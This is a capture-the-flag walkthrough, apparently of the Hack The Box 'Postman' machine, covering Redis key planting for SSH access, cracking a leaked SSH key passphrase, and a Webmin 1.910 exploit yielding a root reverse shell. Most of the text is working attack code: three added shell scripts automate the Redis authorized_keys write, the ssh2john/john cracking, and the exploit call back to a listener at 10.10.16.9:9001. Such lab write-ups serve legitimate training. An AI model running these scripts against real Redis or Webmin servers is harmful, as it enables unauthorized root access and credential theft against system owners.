NETWORK

ENUMERATION

FOOTHOLD

SSH access as Redis

Let's generate an SSH public/private key pair on our Kali machine.

ssh-keygen -t rsa

Let's write the public key to a file, padded with blank lines. The Redis dump we are about to produce wraps the value in binary header and trailer data; the padding keeps the key on a line of its own so sshd, which skips lines it cannot parse, still finds it.

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > attack_key.txt

Then import the file into Redis as the value of a key (-x makes redis-cli read the value from stdin).

cat attack_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key

Save the public key to the authorized_keys file on the Redis server by pointing the RDB dump at the redis user's .ssh directory. This needs the instance to accept commands without AUTH, CONFIG to be enabled, and /var/lib/redis/.ssh to already exist (CONFIG SET dir fails on a missing directory).

redis-cli -h 10.10.10.160
config set dir /var/lib/redis/.ssh
config set dbfilename "authorized_keys"
save

Finally, we can SSH to the Redis server as the redis user with our newly created private key.

ssh -i id_rsa redis@10.10.10.160
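The key-planting steps above as one script. This is an added example, not code from the original write-up; it assumes redis-cli and ssh-keygen are installed on the attacking machine, that the target accepts CONFIG SET, and that /var/lib/redis/.ssh exists. The target address and the redis home directory are the ones used above and can be overridden through environment variables; build_key_payload, redis_unauth, plant_key and run_attack are names chosen here.

```shell
#!/bin/sh
# Added example (not from the original write-up): unauthenticated Redis to SSH
# foothold. Assumes redis-cli/ssh-keygen locally and a writable
# /var/lib/redis/.ssh on the target.

TARGET="${TARGET:-10.10.10.160}"
REDIS_HOME="${REDIS_HOME:-/var/lib/redis}"
KEY="${KEY:-./attack_key}"          # private key path; ssh-keygen adds .pub

# Wrap the public key in blank lines. SAVE writes an RDB file: a "REDIS00xx"
# header plus metadata before our value and an EOF marker/checksum after it.
# sshd ignores authorized_keys lines it cannot parse, so all the padding has
# to guarantee is that the key starts and ends on a line of its own.
build_key_payload() {
    pubkey_file="$1"
    printf '\n\n'
    cat "$pubkey_file"
    printf '\n\n'
}

# Sanity check: does the instance answer without AUTH?
redis_unauth() {
    [ "$(redis-cli -h "$TARGET" ping 2>/dev/null)" = "PONG" ]
}

# Store the payload under a key, then make the next SAVE land in
# ~redis/.ssh/authorized_keys. CONFIG SET dir errors out if the directory
# does not exist, so check its output.
plant_key() {
    build_key_payload "$KEY.pub" | redis-cli -h "$TARGET" -x set ssh_key >/dev/null
    redis-cli -h "$TARGET" config set dir "$REDIS_HOME/.ssh"
    redis-cli -h "$TARGET" config set dbfilename authorized_keys
    redis-cli -h "$TARGET" save
}

run_attack() {
    [ -f "$KEY" ] || ssh-keygen -t rsa -N '' -f "$KEY" -q
    redis_unauth || { echo "[-] $TARGET needs AUTH or is unreachable" >&2; return 1; }
    plant_key
    ssh -i "$KEY" -o StrictHostKeyChecking=no "redis@$TARGET"
}

# Only touch the network when asked; sourcing the file for the helpers is safe.
if [ "${RUN_ATTACK:-0}" = "1" ]; then
    run_attack
fi
```

Run it with RUN_ATTACK=1 to perform the whole chain; without that variable the file only defines the helpers.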

Low access as Matt

While on the server as redis, we noticed the .bash_history file.

The .bash_history has a reference to a file named id_rsa.bak.

A quick search for that file on the server reveals user Matt's SSH private key.

We need a passphrase to use that SSH key

Using ssh2john and John the Ripper we are able to recover that passphrase.

However, the key still does not let us log in as Matt over SSH.

Instead, we use su from the redis shell to switch to Matt directly on the server, trying the recovered passphrase as Matt's password.
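Helpers for the "find the backed-up key, check it, crack its passphrase" steps above, plus the check to run when a cracked key still cannot log in. This is an added example, not the write-up's own commands; it assumes ssh2john and john are installed on the attacking machine (the Kali john package ships the ssh2john wrapper) and that rockyou.txt is the wordlist. The function names and the history/key contents used to exercise them are constructed here.

```shell
#!/bin/sh
# Added example (not from the original write-up): triage around a leaked,
# passphrase-protected SSH key. ssh2john/john are assumed to be installed.

# Lines of a shell history that mention an SSH private key or a backup of one.
key_refs_from_history() {
    grep -E 'id_(rsa|dsa|ecdsa|ed25519)|\.bak' "$1"
}

# Locate candidate key files under a directory (run from the foothold shell).
find_key_backups() {
    find "${1:-/}" -type f -name 'id_rsa*' 2>/dev/null
}

# Is the key passphrase-protected? Legacy PEM keys announce it in the header;
# openssh-key-v1 keys only reveal it when ssh-keygen fails to read them with
# an empty passphrase.
key_is_encrypted() {
    if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        return 0
    elif grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
        ! ssh-keygen -y -P '' -f "$1" >/dev/null 2>&1
    else
        return 1
    fi
}

# ssh2john turns the key into a john hash, john runs a wordlist against it,
# and --show prints "file:passphrase"; we return only the passphrase.
crack_passphrase() {
    key="$1"
    wordlist="${2:-/usr/share/wordlists/rockyou.txt}"
    ssh2john "$key" > "$key.hash"
    john --wordlist="$wordlist" "$key.hash" >/dev/null
    john --show "$key.hash" | sed -n '1s/^[^:]*://p'
}

# When a cracked key is still refused, sshd's per-user policy on the target
# is the first thing to read before suspecting the key itself.
sshd_user_policy() {
    grep -iE '^[[:space:]]*(AllowUsers|DenyUsers|AllowGroups|DenyGroups|Match)' \
        /etc/ssh/sshd_config 2>/dev/null
}
```

Typical use: key_refs_from_history ~/.bash_history on the target, copy the referenced file to the attacking machine, key_is_encrypted id_rsa.bak, then crack_passphrase id_rsa.bak; if ssh -i still fails, run sshd_user_policy on the target and fall back to su Matt with the recovered passphrase.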

PRIV ESCALATION

Webmin access as Matt

The server runs Webmin version 1.910 on port 10000.

Matt's credentials are valid for the Webmin instance.

Because we have valid Webmin credentials, we could use the corresponding Metasploit module, but instead we chose the following exploit from GitHub: https://github.com/roughiz/Webmin-1.910-Exploit-Script

With a listener waiting on port 9001, running the following command gave us a reverse shell on the server. Webmin runs as root, so the shell that comes back is a root shell.

python2 webmin_exploit.py --rhost postman.htb --rport 10000 -u Matt -p computer2008 --lhost 10.10.16.9 --lport 9001 -s true
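Checks worth running around the Webmin step above. This is an added example, not code from the write-up or from the exploit repository; it assumes curl, nc and the downloaded webmin_exploit.py are available, and uses the host, port, user and listener values from the command above (overridable through environment variables). The function names are chosen here, and the header text used to exercise the parser is constructed.

```shell
#!/bin/sh
# Added example (not from the original write-up or the exploit repo): confirm
# the Webmin version before firing the exploit, and remember the listener.

RHOST="${RHOST:-postman.htb}"
RPORT="${RPORT:-10000}"
LHOST="${LHOST:-10.10.16.9}"
LPORT="${LPORT:-9001}"
WUSER="${WUSER:-Matt}"
WPASS="${WPASS:-computer2008}"

# Webmin's own web server identifies itself as "MiniServ/<version>" in the
# Server header; pull the version out of a header dump (curl -I output).
miniserv_version() {
    sed -n 's/^[Ss]erver: *MiniServ\/\([0-9.]*\).*/\1/p' | head -n 1
}

# Fetch headers over TLS (Webmin normally serves https on 10000, hence -k).
probe_webmin() {
    curl -skI --max-time 10 "https://$RHOST:$RPORT/" | miniserv_version
}

# The authenticated command injection the roughiz script uses affects Webmin
# 1.910 and earlier; it needs an account that can reach the Package Updates
# module, and since miniserv runs as root the shell comes back as root.
version_affected() {
    ver="$1"
    [ -n "$ver" ] && awk -v v="$ver" 'BEGIN { exit !(v + 0 <= 1.910) }'
}

# Start "nc -lvnp $LPORT" in another terminal first: the exploit connects
# back to LHOST:LPORT and there is nothing to catch the shell otherwise.
run_exploit() {
    ver="$(probe_webmin)"
    if ! version_affected "$ver"; then
        echo "[-] MiniServ/${ver:-unknown} does not look affected" >&2
        return 1
    fi
    echo "[*] MiniServ/$ver; make sure nc -lvnp $LPORT is listening on $LHOST"
    python2 webmin_exploit.py --rhost "$RHOST" --rport "$RPORT" \
        -u "$WUSER" -p "$WPASS" --lhost "$LHOST" --lport "$LPORT" -s true
}

if [ "${RUN_EXPLOIT:-0}" = "1" ]; then
    run_exploit
fi
```

With RUN_EXPLOIT=1 the script probes the banner, refuses to run against a version that is not affected, and otherwise launches the same command as above.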